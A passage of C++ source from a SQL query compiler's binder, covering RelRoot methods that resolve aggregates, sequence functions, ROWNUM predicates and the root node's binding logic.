== REL_FIRST_N) { realChildNode = child(0)->child(0); } else { realChildNode = child(0); } if(realChildNode->getOperatorType() != REL_SEQUENCE ) { return; } RelSequence * seqNode = (RelSequence *)realChildNode; if (!seqNode->getPartitionBy()) { return; } ItemExpr * partitionBy = seqNode->getPartitionBy()->copyTree(bindWA->wHeap()); ItemExprList origSelectList(getCompExprTree(), bindWA->wHeap()); ItemExprList origPartitionByList(bindWA->wHeap()); if (partitionBy) { origPartitionByList.insertTree(partitionBy); } for (CollIndex i = 0; (i < (CollIndex) origPartitionByList.entries());i++) { ItemExpr * currPartitionByItemExpr = ((ItemExpr *) origPartitionByList[i])->castToItemExpr(); NABoolean selIndexError = FALSE; Int64 selIndex = -1; if (currPartitionByItemExpr->getOperatorType() == ITM_CONSTANT) { ConstValue * cv = (ConstValue*)currPartitionByItemExpr; if ((cv->canGetExactNumericValue()) && (cv->getType()->getScale() == 0)) { selIndex = cv->getExactNumericValue(); if (selIndex <= 0 || selIndex > origSelectList.entries()) { //index in error -- produce error message //in TD mode group by <constant> -- constant is purely positional //selIndexError = TRUE; *CmpCommon::diags() << DgSqlCode(-4366); bindWA->setErrStatus(); return; } else { origPartitionByList.usedEntry( i )= origSelectList.usedEntry((CollIndex)selIndex-1)->copyTree(bindWA->wHeap()); } } } } seqNode->setPartitionBy(origPartitionByList.convertToItemExpr()); } // resolveAggregates - // If aggregate functions have been found in the select list, then // either attach the aggregate functions to the existing GroupBy below // this RelRoot, or if there is no GroupBy create a GroupBy with an // empty groupby list (scalar) and attach the aggregate functions to // this GroupBy. // void RelRoot::resolveAggregates(BindWA *bindWA) { BindScope *currScope = bindWA->getCurrentScope(); if (NOT currScope->getUnresolvedAggregates().isEmpty()) { if (getHasTDFunctions()) { //Using rank function and aggregate functions in the same scope is not supported. *CmpCommon::diags() << DgSqlCode(-4365); bindWA->setErrStatus(); return; } RelExpr *sequence = currScope->getSequenceNode(); // The aggregates were used without a GROUP BY or HAVING // clause, i.e. an implicit aggregation is performed // (with a NULL result for an empty input table). NABoolean implicitGrouping = (child(0)->getOperatorType() != REL_GROUPBY); if(getHasOlapFunctions()) { implicitGrouping = (sequence->child(0)->getOperatorType() != REL_GROUPBY); } GroupByAgg *groupByAgg = NULL; if (implicitGrouping) { RelExpr * realChildNode = NULL; // if my child is a FIRST_N node, then add the GroupByAgg below it. // Otherwise, add the GroupByAgg below me. if (child(0)->getOperatorType() == REL_FIRST_N) { realChildNode = child(0)->child(0); } else realChildNode = child(0); if(getHasOlapFunctions()) { realChildNode = sequence->child(0); } groupByAgg = new (bindWA->wHeap()) GroupByAgg(realChildNode,REL_GROUPBY); realChildNode->setBlockStmt(isinBlockStmt()); if(getHasOlapFunctions()) sequence->setChild(0, groupByAgg); else if (child(0)->getOperatorType() == REL_FIRST_N) child(0)->setChild(0, groupByAgg); else setChild(0, groupByAgg); groupByAgg->setBlockStmt(isinBlockStmt()); } else { if(getHasOlapFunctions()) { groupByAgg = (GroupByAgg *)sequence->child(0).getPtr(); } else { groupByAgg = (GroupByAgg *)child(0).getPtr(); } } NAString colName(bindWA->wHeap()); Lng32 sqlCode = 0; ValueId valId = NULL_VALUE_ID; if (currScope->context()->unaggColRefInSelectList()) { sqlCode = -4021; valId = currScope->context()->unaggColRefInSelectList()->getValueId(); } else if (implicitGrouping) { // Genesis 10-000414-9410: "SELECT SUM(A),* FROM T; --no GROUP BY" // cannot be flagged with err 4012 in ColReference::bindNode // because table not marked "grouped" yet. // const ColumnDescList &cols = *currScope->getRETDesc()->getColumnList(); CollIndex i, n = cols.entries(); for (i=0; i<n; i++) { const ColumnDesc *col = cols[i]; if (!col->isGrouped()) if (col->getColRefNameObj().isStar() || col->getValueId().getNAColumn(TRUE/*okIfNotColumn*/)) { sqlCode = -4012; valId = col->getValueId(); colName = col->getColRefNameObj().getColRefAsAnsiString(); break; } } } // Table has no GROUP BY (so no grouping columns exist at all) // but is grouped by dint of a column reference within an aggregate, // making any unaggregated column references illegal, by ANSI 7.9 SR 7. if (sqlCode) { if (colName.isNull()) { const NAColumn *nacol = valId.getNAColumn(TRUE/*okIfNotColumn*/); if (nacol) colName = nacol->getFullColRefNameAsAnsiString(); else colName = "_unnamed_column_"; } // 4012 Col ref must be grouping or aggregated -- no star ref allowed! // 4021 The select list contains a non-grouping non-aggregated column. *CmpCommon::diags() << DgSqlCode(sqlCode) << DgColumnName(colName); bindWA->setErrStatus(); return; } // Move the unresolved aggregates into the groupby node and bind // (simply returns if "groupByAgg" isn't new). groupByAgg->aggregateExpr() += currScope->getUnresolvedAggregates(); currScope->getUnresolvedAggregates().clear(); groupByAgg->bindNode(bindWA); } } // resolveSequenceFunctions - // Add the unresolvedSequenceFunctions to the Sequence node for this // scope. If there are sequence functions, but no sequence node, it // is an error. Also if there is a sequence node, but no sequence // functions, it is an error. // // void RelRoot::resolveSequenceFunctions(BindWA *bindWA) { BindScope *currScope = bindWA->getCurrentScope(); // If we have a Sequence Node associated with the RelRoot node, // RelSequence *sequenceNode = (RelSequence *)currScope->getSequenceNode(); currScope->getSequenceNode() = NULL; if (sequenceNode) { if (getHasTDFunctions() && sequenceNode->child(0)->getOperatorType() == REL_GROUPBY) { //Using rank function and group by clause in the same scope is not supported. *CmpCommon::diags() << DgSqlCode(-4366); bindWA->setErrStatus(); return; } CMPASSERT(sequenceNode->getOperatorType() == REL_SEQUENCE); // Do not allow sequence functions or OLAP Window functions // with Embedded Updates. // if (getGroupAttr()->isEmbeddedUpdateOrDelete()){ *CmpCommon::diags() << DgSqlCode(-4202) << (getGroupAttr()->isEmbeddedUpdate() ? DgString0("UPDATE"):DgString0("DELETE")); bindWA->setErrStatus(); return; } // If there are some sequence functions that have not been attached // to the Sequence node, do so now. These were found when binding // the select list. // sequenceNode-> addUnResolvedSeqFunctions(currScope->getUnresolvedSequenceFunctions(), bindWA); currScope->getUnresolvedSequenceFunctions().clear(); currScope->getAllSequenceFunctions().clear(); if (bindWA->errStatus()) return; // Make sure the sequence function has some work to do. // The cast is needed since the compiler will attempt to pick the // protected (writable) version of 'sequenceFunctions()'. (Is this // a compiler bug) // if ((((const RelSequence *)sequenceNode)->sequenceFunctions().isEmpty() ) && ( !getHasOlapFunctions() && ((const RelSequence *)sequenceNode)->requiredOrder().entries() != 0 )) { // Can't have a sequence by clause without // sequence functions. // *CmpCommon::diags() << DgSqlCode(-4111); bindWA->setErrStatus(); return; } } else if (! currScope->getUnresolvedSequenceFunctions().isEmpty()) { // Can't have sequence functions without a // sequence by clause. // First, loop through the list of functions. // ValueIdSet &unresolved = currScope->getUnresolvedSequenceFunctions(); NAString unparsed(bindWA->wHeap()); for (ValueId vid = unresolved.init(); unresolved.next(vid); unresolved.advance(vid)) { ItemExpr *ie = vid.getItemExpr(); CMPASSERT(ie->isASequenceFunction()); unparsed += ", "; ie->unparse(unparsed, DEFAULT_PHASE, USER_FORMAT_DELUXE); } unparsed.remove(0,2); // remove initial ", " *CmpCommon::diags() << DgSqlCode(-4110) << DgString0(unparsed); bindWA->setErrStatus(); return; } } // if a where pred is specified on an immediate child scan or rename node, // and it contains an 'and'ed rownum() predicate of the form: // rownum < val, or rownum <= val, or rownum = val // then get the val and make it the firstN value. // Also, remove this predicate from selPredTree. void RelRoot::processRownum(BindWA * bindWA) { NABoolean specialMode = (CmpCommon::getDefault(MODE_SPECIAL_4) == DF_ON); if (NOT specialMode) return; if (! child(0)) return; if ((child(0)->getOperatorType() != REL_SCAN) && (child(0)->getOperatorType() != REL_RENAME_TABLE)) return; if (! child(0)->selPredTree()) return; ItemExpr * wherePred = child(0)->selPredTree(); ItemExprList iel(wherePred, bindWA->wHeap(), ITM_AND, FALSE, FALSE); NABoolean found = FALSE; for (Lng32 i = 0; ((NOT found) && (i < iel.entries())); i++) { ItemExpr * ie = iel[i]; if (ie->getArity() != 2) continue; if (NOT ((ie->getOperatorType() == ITM_LESS) || (ie->getOperatorType() == ITM_EQUAL) || (ie->getOperatorType() == ITM_LESS_EQ))) continue; ItemExpr * child0 = ie->child(0)->castToItemExpr(); ItemExpr * child1 = ie->child(1)->castToItemExpr(); if (NOT ((child0->getOperatorType() == ITM_REFERENCE) && (child1->getOperatorType() == ITM_CONSTANT))) continue; ColReference * col = (ColReference*)child0; ColRefName &colRefName = col->getColRefNameObj(); CorrName &cn = col->getCorrNameObj(); const NAString &catName = cn.getQualifiedNameObj().getCatalogName(); const NAString &schName = cn.getQualifiedNameObj().getSchemaName(); const NAString &objName = cn.getQualifiedNameObj().getObjectName(); const NAString &colName = colRefName.getColName(); if (NOT ((catName.isNull()) && (schName.isNull()) && (objName.isNull()) && (colName == "ROWNUM"))) continue; ConstValue * cv = (ConstValue*)child1; if (NOT cv->canGetExactNumericValue()) continue; Int64 val = cv->getExactNumericValue(); if (val < 0) continue; if ((ie->getOperatorType() == ITM_EQUAL) && (val != 1)) continue; if ((ie->getOperatorType() == ITM_LESS) && (val > 0)) val--; setFirstNRows(val); // remove this pred from the list iel.removeAt(i); found = TRUE; } if (found) { // convert the list back to selection pred. ItemExpr * ie = iel.convertToItemExpr(); child(0)->removeSelPredTree(); child(0)->addSelPredTree(ie); } return; } RelExpr *RelRoot::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } if (isTrueRoot()) { // if this is simple scalar aggregate on a seabase table // (of the form: select count(*), sum(a) from t; ) // then transform it so it could be evaluated using hbase co-processor. if ((CmpCommon::getDefault(HBASE_COPROCESSORS) == DF_ON) && (child(0) && child(0)->getOperatorType() == REL_SCAN)) { Scan * scan = (Scan*)child(0)->castToRelExpr(); if ((getCompExprTree()) && (NOT hasOrderBy()) && (! getSelPredTree()) && (! scan->getSelPredTree()) && (scan->selectionPred().isEmpty()) && ((scan->getTableName().getSpecialType() == ExtendedQualName::NORMAL_TABLE) || (scan->getTableName().getSpecialType() == ExtendedQualName::INDEX_TABLE)) && !scan->getTableName().isPartitionNameSpecified() && !scan->getTableName().isPartitionRangeSpecified() && (NOT bindWA->inViewDefinition())) { ItemExprList selList(bindWA->wHeap()); selList.insertTree(getCompExprTree()); // for now, only count(*) can be co-proc'd if ((selList.entries() == 1) && (selList[0]->getOperatorType() == ITM_COUNT) && (selList[0]->origOpType() == ITM_COUNT_STAR__ORIGINALLY)) { NATable *naTable = bindWA->getNATable(scan->getTableName()); if (bindWA->errStatus()) return this; if (((naTable->getObjectType() == COM_BASE_TABLE_OBJECT) || (naTable->getObjectType() == COM_INDEX_OBJECT)) && ((naTable->isSeabaseTable()) || ((naTable->isHiveTable()) && (naTable->getClusteringIndex()->getHHDFSTableStats()->isOrcFile())))) { Aggregate * agg = new(bindWA->wHeap()) Aggregate(ITM_COUNT, new (bindWA->wHeap()) SystemLiteral(1), FALSE /*i.e. not distinct*/, ITM_COUNT_STAR__ORIGINALLY, '!'); agg->bindNode(bindWA); if (bindWA->errStatus()) { return this; } ValueIdSet aggrSet; aggrSet.insert(agg->getValueId()); ExeUtilExpr * eue = NULL; if (naTable->isSeabaseTable()) eue = new(CmpCommon::statementHeap()) ExeUtilHbaseCoProcAggr(scan->getTableName(), aggrSet); else eue = new(CmpCommon::statementHeap()) ExeUtilOrcFastAggr(scan->getTableName(), aggrSet); eue->bindNode(bindWA); if (bindWA->errStatus()) { return this; } setChild(0, eue); removeCompExprTree(); addCompExprTree(agg); } // if seabaseTable } // count aggr } } // coproc on if (child(0) && ((child(0)->getOperatorType() == REL_INSERT) || (child(0)->getOperatorType() == REL_UNARY_INSERT) || (child(0)->getOperatorType() == REL_LEAF_INSERT))) { Insert * ins = (Insert*)child(0)->castToRelExpr(); if (ins->isNoRollback()) { if ((CmpCommon::getDefault(AQR_WNR) != DF_OFF) && (CmpCommon::getDefault(AQR_WNR_INSERT_CLEANUP) != DF_OFF)) ins->enableAqrWnrEmpty() = TRUE; } if (CmpCommon::transMode()->anyNoRollback()) { // tbd - may need to integrate these two. if ((CmpCommon::getDefault(AQR_WNR) != DF_OFF) && (CmpCommon::getDefault(AQR_WNR_INSERT_CLEANUP) != DF_OFF)) ins->enableAqrWnrEmpty() = TRUE; } } // if lob is being extracted as chunks of string, then only one // such expression could be specified in the select list. // If this is the case, then insert ExeUtilLobExtract operator. // This operator reads lob contents and returns them to caller as // multiple rows. // This lobextract function could only be used in the outermost select // list and must be converted at this point. // It is not evaluated on its own. if (getCompExprTree()) { ItemExprList selList(bindWA->wHeap()); selList.insertTree(getCompExprTree()); if ((selList.entries() == 1) && (selList[0]->getOperatorType() == ITM_LOBEXTRACT)) { LOBextract * lef = (LOBextract*)selList[0]; ExeUtilLobExtract * le = new (PARSERHEAP()) ExeUtilLobExtract (lef, ExeUtilLobExtract::TO_STRING_, NULL, NULL, lef->getTgtSize(), 0, NULL, NULL, NULL, child(0), PARSERHEAP()); le->setHandleInStringFormat(FALSE); setChild(0, le); } } processRownum(bindWA); } // isTrueRoot if (getHasTDFunctions()) { transformTDPartitionOrdinals(bindWA); if (bindWA->errStatus()) return NULL; } RelRoot * returnedRoot = transformGroupByWithOrdinalPhase1(bindWA); if (! returnedRoot) return NULL; returnedRoot = transformOrderByWithExpr(bindWA); if (! returnedRoot) return NULL; if (bindWA->getCurrentScope()->context()->inTableCheckConstraint()) { // See ANSI 11.9 Leveling Rule 1a (Intermediate Sql). // 4089 A check constraint cannot contain a subquery. *CmpCommon::diags() << DgSqlCode(-4089) << DgConstraintName( bindWA->getCurrentScope()->context()->inCheckConstraint()-> getConstraintName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); } if (isTrueRoot()) bindWA->setTopRoot(this); bindWA->setBindTrueRoot(isTrueRoot()); if (!bindWA->getAssignmentStArea()) { bindWA->getAssignmentStArea() = new (bindWA->wHeap()) AssignmentStArea(bindWA); bindWA->getAssignmentStArea()->getAssignmentStHostVars() = new (bindWA->wHeap()) AssignmentStHostVars(bindWA); } // If there are one or more output rowset variables, then we introduce // a RowsetInto node below this Root node. The RowsetInto node will // create a Pack node later on when it is binded, so that we can // insert values into the rowset output variables. // We don't do this transformation if we are inside a compound statement. // if (isTrueRoot() && assignmentStTree()) { ItemExpr *outputVar = getOutputVarTree(); if (outputVar) { CMPASSERT(outputVar->getChild(0)->getOperatorType() == ITM_HOSTVAR); HostVar *hostVar = (HostVar *) outputVar->getChild(0); if (hostVar->getType()->getTypeQualifier() == NA_ROWSET_TYPE) { ItemExpr *outputVar = removeOutputVarTree(); assignmentStTree() = NULL; // Get the output size expression. It may be a constant or a variable. ItemExpr * sizeExpr = getHostArraysArea()->outputSize(); // set the SelectIntoRowsets flag getHostArraysArea()->setHasSelectIntoRowsets(TRUE); // Create INTO node. Its child is the current root RelExpr *intoNode = new (bindWA->wHeap()) RowsetInto(this, outputVar, sizeExpr); //If case of first N with ORDER BY generator introduces the FIRST N //operator. For rowsets FIRST N node need to be introduced below the //PACK node and not below the top root. So set first N rows for INTO //node and not the top root. if (hasOrderBy()) { intoNode->setFirstNRows(getFirstNRows()); setFirstNRows(-1); } // Create a new root node that will go above the RowsetInto node setRootFlag(FALSE); RelRoot *newRoot = new (bindWA->wHeap()) RelRoot(intoNode); newRoot->setRootFlag(TRUE); // copy the display flag from this true Root to the new root. // newRoot->setDisplayTree(getDisplayTree()); newRoot->setDisplayTree(TRUE); newRoot->addInputVarTree(removeInputVarTree()); newRoot->outputVarCnt() = outputVarCnt(); NABoolean defaultSortedRows = newRoot->needFirstSortedRows(); //Int64 defaultFirstNRows = newRoot->getFirstNRows(); newRoot->needFirstSortedRows() = needFirstSortedRows(); //newRoot->setFirstNRows(getFirstNRows()); needFirstSortedRows() = defaultSortedRows; // setFirstNRows(defaultFirstNRows); newRoot->rollbackOnError() = rollbackOnError(); // migrate hostArraysArea to newroot, and tell bindWA about it newRoot->setHostArraysArea(getHostArraysArea()); bindWA->setHostArraysArea(getHostArraysArea()); setSubRoot(FALSE); // old root is no longer the root newRoot->setSubRoot(TRUE); // newRoot becomes the root return newRoot->bindNode(bindWA); } } } if (assignmentStTree() && child(0)->getOperatorType() != REL_ROWSET_INTO) { AssignmentStHostVars *ptr = new (bindWA->wHeap()) AssignmentStHostVars(bindWA); if (ptr->containsRowsets(assignmentStTree())) { ItemExpr *outputSizeExpr = NULL; // The user may have used the ROWSET FOR OUTPUT SIZE construct // set the SelectIntoRowsets flag. if (getHostArraysArea()) { outputSizeExpr = getHostArraysArea()->outputSize(); getHostArraysArea()->setHasSelectIntoRowsets(TRUE); } // Create RowsetInto node. Its child is the current root RelExpr *intoNode = new (bindWA->wHeap()) RowsetInto(this, assignmentStTree(), outputSizeExpr); //If case of first N with ORDER BY generator introduces the FIRST N //operator. For rowsets FIRST N node need to be introduced below the //PACK node and not below the top root. So set first N rows for INTO //node and not the top root. if (hasOrderBy()) { intoNode->setFirstNRows(getFirstNRows()); setFirstNRows(-1); } RelRoot *newRoot = new (bindWA->wHeap()) RelRoot(*this); newRoot->child(0) = intoNode; newRoot->removeCompExprTree(); setRootFlag(FALSE); removeInputVarTree(); assignmentStTree() = NULL; return newRoot->bindNode(bindWA); } } // Create a new scope. // if (!isDontOpenNewScope()) // -- Triggers. { bindWA->initNewScope(); // MV -- if(TRUE == hasMvBindContext()) { // Copy the MvBindContext object from the RelRoot node to the // current BindContext. bindWA->markScopeWithMvBindContext(getMvBindContext()); } if (getInliningInfo().isTriggerRoot()) { CMPASSERT(getInliningInfo().getTriggerObject() != NULL); bindWA->getCurrentScope()->context()->triggerObj() = getInliningInfo().getTriggerObject()->getCreateTriggerNode(); } if (getInliningInfo().isActionOfRI()) bindWA->getCurrentScope()->context()->inRIConstraint() = TRUE; } // Save whether the user specified SQL/MP-style access options in the query // (this is always true for the LOCK stmt, which we must maximize). // if (child(0)->getOperatorType() == REL_LOCK) { accessOptions().updateAccessOptions( TransMode::ILtoAT(TransMode::READ_COMMITTED_), ((RelLock *)child(0).getPtr())->getLockMode()); accessOptions().updateAccessOptions( TransMode::ILtoAT(CmpCommon::transMode()->getIsolationLevel())); } // QSTUFF: the updateOrDelete flag is set to ensure that scans done as // part of a generic update cause an exclusive lock to be set to ensure // a consistent completion of the following update or delete. if (containsUpdateOrDelete(this)) { accessOptions().setUpdateOrDelete(TRUE); } else if (isTrueRoot()) { // if the query does not contain any Generic Update nodes, mark it // as read only query. In that case, we have freedom not to include // some indexes in the indexes list. bindWA->setReadOnlyQuery(); } // This block of code used to be in RelRoot::propagateAccessOptions() which // used to be called from here. We've since replaced this old 'push' call // with the 'pull' of BindWA->findUserSpecifiedAccessOption() calls from // RelRoot, Scan, and GenericUpdate. // QSTUFF // We decided to stick with READ COMMITTED as the default access // (even for streams). However, if we change our mind again, this is // the place to do it. // if (getGroupAttr()->isStream() && // (accessOptions().accessType() == ACCESS_TYPE_NOT_SPECIFIED_)) // accessOptions().accessType() = SKIP_CONFLICT_; // Set the flag to indicate to DP2 that this executes an // embedded update or delete. if (getGroupAttr()->isEmbeddedUpdateOrDelete()) accessOptions().setUpdateOrDelete(TRUE); // QSTUFF if (accessOptions().userSpecified()) bindWA->getCurrentScope()->context()->setStmtLevelAccessOptions(accessOptions()); if (isSubRoot() && getHostArraysArea()) getHostArraysArea()->setRoot(this); if (isTrueRoot()) { // If this were false, then SynthType's ValueDesc::create() // would use a DIFFERENT SchemaDB than BindItemExpr's createValueDesc() // -- wrong! Assert this only once per query. CMPASSERT(ActiveSchemaDB() == bindWA->getSchemaDB()); // set the upDateCurrentOf_ attribute for the root if possible if (child(0)->getOperatorType() == REL_UNARY_UPDATE || child(0)->getOperatorType() == REL_UNARY_DELETE) { GenericUpdate *gu = (GenericUpdate *)child(0)->castToRelExpr(); if (gu->updateCurrentOf()) { updateCurrentOf() = gu->updateCurrentOf(); currOfCursorName() = gu->currOfCursorName(); } } // If we are processing a rowset, // then the child operator is a REL_TSJ. // If this is the case, and the operation is // an update or delete, we need to search // further to deterine its correct child // operator type. // Otherwise, the child operator type is correct. if (bindWA->getHostArraysArea() && bindWA->getHostArraysArea()->hasHostArraysInWhereClause() && bindWA->getHostArraysArea()->hasInputRowsetsInSelectPredicate() == HostArraysWA::NO_ && NOT bindWA->getHostArraysArea()->hasHostArraysInTuple()) // ensure that we don't flag rowset selects or insert selects with rowsets in the predicate { if (bindWA->getHostArraysArea()->hasHostArraysInSetClause()) // includes rowset merge statements too childOperType() = REL_UNARY_UPDATE; else childOperType() = REL_UNARY_DELETE; } else childOperType() = child(0)->getOperator(); // see if we can potentially optimize the buffer sizes for // oltp queries. Done for update/delete/insert-values/select-unique. // if scan, olt opt is possible. if (childOperType() == REL_SCAN) oltOptInfo().setOltOpt(TRUE); /* // For Denali release 1, compound statements are restricted // to yield at most one row; so olt opt is possible for CS. // If a compound statement is not pushed down to DP2, then // OLT optimization will be turned off in generator. // // Turn it off for Compound statement as insertion with tuple list // is possible in a CS. */ else if (childOperType() == REL_COMPOUND_STMT) oltOptInfo().setOltOpt(TRUE); // if INSERT...VALUES, olt opt is possible. else if ((childOperType() == REL_UNARY_INSERT) && (NOT child(0)->child(0) || child(0)->child(0)->getOperatorType() == REL_TUPLE)) oltOptInfo().setOltOpt(TRUE); } // isTrueRoot else if (checkFirstNRowsNotAllowed(bindWA)) { *CmpCommon::diags() << DgSqlCode(-4102); bindWA->setErrStatus(); return NULL; } BindScope *currScope = bindWA->getCurrentScope(); // -- MVs // Check for the Refresh node before binding, because after binding it // will be gone. if (child(0)->getOperatorType() == REL_REFRESH) setRootOfInternalRefresh(); // set the currect host area in bindWA for non-root stmt. // fix 10-031106-4430 (RG: mxcmp failed to compile INSERT // statement with rowsets within IF statement) HostArraysWA *tempWA = NULL; if ( NOT isTrueRoot() && getHostArraysArea() ) { tempWA = bindWA->getHostArraysArea(); bindWA->setHostArraysArea(getHostArraysArea()); } bindWA->setBindTrueRoot(FALSE); // Bind the children here to determine if we need to rollback on error // for embedded update/delete's. // bindChildren(bindWA); if ( tempWA ) { // Restore previous environment bindWA->setHostArraysArea(tempWA); } if (bindWA->errStatus()) return NULL; // For SPJ, store the spOutParams_ from the bindWA in RelRoot, // We need it at codegen if ( bindWA->getSpOutParams ().entries ()) spOutParams_ = &( bindWA->getSpOutParams ()); if (isTrueRoot()) { if (child(0)->getGroupAttr()->isEmbeddedUpdateOrDelete()) { // Olt optimization is now supported for embedded updates/deletes (pub/sub // thingy) for now. oltOptInfo().setOltOpt(TRUE); if (getFirstNRows() != -1) { // [FIRST/ANY n] syntax cannot be used with an embedded update or embedded delete. *CmpCommon::diags() << DgSqlCode(-4216); bindWA->setErrStatus(); return NULL; } } // If updateCurrentOf_ not set yet // Check the tree for a GenericUpdate RelExpr (anywhere in the tree) // so we can set the root node accordingly. GenericUpdate *gu = getGenericUpdate(this); if (!updateCurrentOf() && gu && gu->updateCurrentOf()) { updateCurrentOf() = gu->updateCurrentOf(); currOfCursorName() = gu->currOfCursorName(); } // if standalone update/delete(no update where current of), // olt opt is possible. if (((childOperType() == REL_UNARY_UPDATE) || (childOperType() == REL_UNARY_DELETE)) && (NOT updateCurrentOf())) oltOptInfo().setOltOpt(TRUE); // If transaction statement (begin/commit/rollback/set xn, // olt opt is possible. if (childOperType() == REL_TRANSACTION) oltOptInfo().setOltOpt(TRUE); // Set indication whether transaction need to be aborted on error // during an IUD query. // Rollback will be done for a query that contains // rowsets, or an insert which is // not an 'insert...values' with a single value. // // There are more cases when a transaction will be rolled back on // an IUD error. These are set in GenericUpdate::preCodeGen, // and DP2(IUD)::preCodeGen. // These include embedded update or delete, stream access, non-unique // update or delete... See ::preCodeGen methods for details. rollbackOnError() = FALSE; if (childOperType().match(REL_ANY_GEN_UPDATE)) { if (bindWA->getHostArraysArea() && bindWA->getHostArraysArea()->done()) // rowsets rollbackOnError() = TRUE; else if ((childOperType() == REL_UNARY_INSERT) && (child(0)->child(0) && child(0)->child(0)->getOperatorType() != REL_TUPLE)) rollbackOnError() = TRUE; } if (bindWA->getHostArraysArea() && bindWA->getHostArraysArea()->getTolerateNonFatalError()) { setTolerateNonFatalError(RelExpr::NOT_ATOMIC_); } } CMPASSERT(currScope == bindWA->getCurrentScope()); // sanity check // do not do olt qry optimization, if rowsets are present. if (bindWA->getHostArraysArea() && bindWA->getHostArraysArea()->done()) { oltOptInfo().setOltOpt(FALSE); if (bindWA->getHostArraysArea()->getTolerateNonFatalError()) { // we also cannot do dp2 level olt optimization if this is a non-atomic rowset insert oltOptInfo().setOltEidOpt(FALSE); } else { // but can do dp2 level olt optimization if this is "regular" rowset insert oltOptInfo().setOltEidOpt(TRUE); } } // If unresolved aggregate functions have been found in the children of the // root node, that would mean that we are referencing aggregates before // the groupby operation is performed if (checkUnresolvedAggregates(bindWA)) return this; // A RelRoot does not have a select list for SQL update, delete, insert // statements as well as when the query contains an SQL union. If a // select list is absent, assign the select list of its child to it. // This will propagate the selection lists of the children of the // union up to the root. // // Detach the item expression tree for the select list and bind it. // ItemExpr *compExprTree = removeCompExprTree(); if (NOT compExprTree) { // -- for RI and Triggers if (isEmptySelectList()) setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA)); else { setRETDesc(child(0)->getRETDesc()); getRETDesc()->getValueIdList(compExpr()); } } else { CMPASSERT(!currScope->context()->inSelectList()); currScope->context()->inSelectList() = TRUE; // QSTUFF // in case we are binding an embedded generic update within a view // we have to rename column references using OLD or NEW as // table names since we adopted the RETDesc/TableDesc of the // scan node or the view scan node, i.e. the RenameTable node // at the root of an expanded view. if (bindWA->renameToScanTable()){ ColReference * cr = NULL; ItemExpr * itm = compExprTree; NABoolean done = FALSE; const CorrName corr = (getViewScanNode()->getOperatorType() == REL_RENAME_TABLE) ? ((RenameTable *)getViewScanNode())->getTableName() : ((Scan *)getViewScanNode())->getTableDesc()->getCorrNameObj(); while (NOT done){ if (itm->getOperatorType() == ITM_ITEM_LIST){ cr = (ColReference *) itm->getChild(0); itm = itm->getChild(1)->castToItemExpr(); } else { cr = (ColReference *) itm; done = TRUE; } cr->getCorrNameObj().getQualifiedNameObj(). setObjectName(corr.getQualifiedNameObj().getObjectName()); } } // QSTUFF RelRoot *viewQueryRoot = NULL; StmtDDLCreateView *pCreateView = NULL; if (bindWA->inViewDefinition()) { pCreateView = bindWA->getCreateViewParseNode(); if (pCreateView->getQueryExpression() == this) { viewQueryRoot = this; CMPASSERT(isTrueRoot()); pCreateView->setCurViewColNum((CollIndex)0); } } // charset inference compExprTree->setResolveIncompleteTypeStatus(TRUE); HostArraysWA * arrayWA = bindWA->getHostArraysArea() ; if (arrayWA && arrayWA->hasHostArraysInTuple()) { CollIndex counterRowVals = 0; CMPASSERT(!bindWA->getCurrentScope()->context()->counterForRowValues()); bindWA->getCurrentScope()->context()->counterForRowValues() = &counterRowVals; // If this query (scope) contains OLAP Window functions, then add // a Sequence Operator just below the Root node. Also, if aggregates // exist, resolve them now. // setRETDesc(bindRowValues(bindWA, compExprTree, compExpr(), this, isTrueRoot())); bindWA->getCurrentScope()->context()->counterForRowValues() = NULL; } else { setRETDesc(bindRowValues(bindWA, compExprTree, compExpr(), viewQueryRoot, isTrueRoot())); } if (bindWA->errStatus()) return NULL; if (viewQueryRoot) pCreateView->resetCurViewColNum(); currScope->context()->inSelectList() = FALSE; } // MVs -- if (bindWA->isPropagateOpAndSyskeyColumns() && child(0)->getOperatorType()!=REL_GROUPBY && child(0)->getOperatorType()!=REL_AGGREGATE && currScope->getUnresolvedAggregates().isEmpty() && !isEmptySelectList() && !isTrueRoot()) getRETDesc()->propagateOpAndSyskeyColumns(bindWA, TRUE); CMPASSERT(currScope == bindWA->getCurrentScope()); // sanity check currScope->setRETDesc(getRETDesc()); bindWA->setRenameToScanTable(FALSE); // QSTUFF // Genesis 10-980106-2038 + 10-990202-1098. // if (isTrueRoot()) { castComputedColumnsToAnsiTypes(bindWA, getRETDesc(), compExpr()); if (bindWA->errStatus()) return NULL; } // Genesis 10-970822-2581. See finalize() in SqlParser.y. // // If we are in a compound statement (an IF's UNION), do not issue an error. // // Added condition for CALL StoredProcedures // If we invoke a CALL statement, the #out params do not match the // # columns, we make that check in the CallSP::bindNode, so ignore it // for now. if (isTrueRoot() && (child(0)->getOperatorType() != REL_CALLSP && (child(0)->getOperatorType() != REL_COMPOUND_STMT && (child(0)->getOperatorType() != REL_TUPLE && (Int32)getRETDesc()->getDegree() != 0))) && (child(0)->getOperatorType() != REL_UNION || (!((Union *) (RelExpr *) child(0))->getUnionForIF())) && outputVarCntValid() && outputVarCnt() != (Int32)getRETDesc()->getDegree() && (outputVarCnt() || CmpCommon::context()->GetMode() != STMT_DYNAMIC)) { // 4093 The number of output parameters ($0) must equal the number of cols // 4094 The number of output host vars ($0) must equal the number of cols Lng32 sqlcode = (CmpCommon::context()->GetMode() == STMT_DYNAMIC) ? -4093 : -4094; *CmpCommon::diags() << DgSqlCode(sqlcode) #pragma nowarn(1506) // warning elimination << DgInt0(outputVarCnt()) << DgInt1(getRETDesc()->getDegree()); #pragma warn(1506) // warning elimination bindWA->setErrStatus(); return NULL; } ItemExpr *inputVarTree = removeInputVarTree(); if (inputVarTree) { inputVarTree->convertToValueIdList(inputVars(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) return NULL; // If DYNAMIC SQL compilation, then // remove from the input var list (list of HostVars and DynamicParams) // any env vars that were found to have a equivalence value which is // valid (parseable) for the context it appears in // (i.e., we've already bound the env var name's dynamic value, // so we no longer need the env var name at all). // Right now, this means that in sqlci you can say // set envvar xyz cat.sch.tbl; // select * from $xyz; // if (CmpCommon::context()->GetMode() == STMT_DYNAMIC) { for (CollIndex i = inputVars().entries(); i--; ) { HostVar *hostVar = (HostVar *)inputVars()[i].getItemExpr(); if (hostVar->getOperatorType() == ITM_HOSTVAR && 